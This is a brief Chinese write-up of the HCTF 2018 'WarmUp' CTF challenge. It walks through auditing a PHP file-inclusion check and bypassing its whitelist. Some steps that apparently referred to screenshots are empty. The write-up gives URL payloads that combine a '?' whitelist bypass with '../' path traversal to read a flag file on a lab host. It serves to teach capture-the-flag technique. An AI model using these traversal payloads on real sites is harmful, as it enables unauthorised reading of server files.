[HCTF 2018]WarmUp PHP 代码审计

查看网页源代码：

 

 

 访问source.php

 

 

 根据题目提示，代码审计，可知需要进行代码绕过checkFile检查

 

 

 

访问hint.php

 

 

 主要绕过：

 

 

 所以需要两个??中间的文件格式符合白名单

 

 

 则可构造payload：

http://4bcffbec-7e0e-499c-968a-c0256bad70b0.node4.buuoj.cn:81/?file=source.php?ffffllllaaaagggg     不成功则继续构造

http://4bcffbec-7e0e-499c-968a-c0256bad70b0.node4.buuoj.cn:81/?file=source.php?../../../../ffffllllaaaagggg    不成功继续构造

http://4bcffbec-7e0e-499c-968a-c0256bad70b0.node4.buuoj.cn:81/?file=source.php?../../../../../ffffllllaaaagggg    成功！

 

 

 

 得到flag！